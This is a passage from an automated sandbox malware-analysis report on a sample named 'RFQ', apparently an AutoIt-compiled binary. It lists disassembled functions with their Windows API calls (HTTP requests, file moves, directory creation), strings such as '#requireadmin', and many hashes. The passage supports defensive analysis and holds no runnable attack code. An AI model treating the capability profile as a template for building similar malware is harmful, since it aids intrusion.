                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                          Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                          Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_memcmp
                                                                          • String ID: '$\$h
                                                                          • API String ID: 2205784470-1303700344
                                                                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                          Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                          • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                          • __swprintf.LIBCMT ref: 0045EC33
                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                          Strings
                                                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                          • String ID: %4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 2441338619-1568723262
                                                                          • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                                          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                          • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                                          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                          Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                          • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                          • String ID: @COM_EVENTOBJ
                                                                          • API String ID: 327565842-2228938565
                                                                          • Opcode ID: 2d2e6611baaaed01bf0ac91f3b08fe096b6b0ff8b1e1267574a63fcd06cc1b28
                                                                          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                          • Opcode Fuzzy Hash: 2d2e6611baaaed01bf0ac91f3b08fe096b6b0ff8b1e1267574a63fcd06cc1b28
                                                                          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                          Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                          • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                          • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                          • VariantClear.OLEAUT32(?), ref: 00470516
                                                                            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                          • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                          • String ID: H
                                                                          • API String ID: 3613100350-2852464175
                                                                          • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                                          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                          • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                                          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                          Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                          • DestroyWindow.USER32(?), ref: 00426F50
                                                                          • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                          • String ID: close all
                                                                          • API String ID: 4174999648-3243417748
                                                                          • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                          • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                          Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                          • String ID:
                                                                          • API String ID: 1291720006-3916222277
                                                                          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                          Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                          • IsMenu.USER32(?), ref: 0045FC5F
                                                                          • CreatePopupMenu.USER32 ref: 0045FC97
                                                                          • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                          • String ID: 0$2
                                                                          • API String ID: 93392585-3793063076
                                                                          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                          Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                          • VariantClear.OLEAUT32(?), ref: 00435320
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                          • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                          • String ID: crts
                                                                          • API String ID: 586820018-3724388283
                                                                          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                          Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                          • _wcscat.LIBCMT ref: 0044BCAF
                                                                          • _wcslen.LIBCMT ref: 0044BCBB
                                                                          • _wcslen.LIBCMT ref: 0044BCD1
                                                                          • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 2326526234-1173974218
                                                                          • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                          • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                          Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                          • _wcslen.LIBCMT ref: 004335F2
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                          • GetLastError.KERNEL32 ref: 0043362B
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                          • _wcsrchr.LIBCMT ref: 00433666
                                                                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                          • String ID: \
                                                                          • API String ID: 321622961-2967466578
                                                                          • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                          • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                          Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                          • API String ID: 1038674560-2734436370
                                                                          • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                          • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                          Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                          • LoadStringW.USER32(00000000), ref: 00434060
                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                          • LoadStringW.USER32(00000000), ref: 00434078
                                                                          • _wprintf.LIBCMT ref: 004340A1
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                          Strings
                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
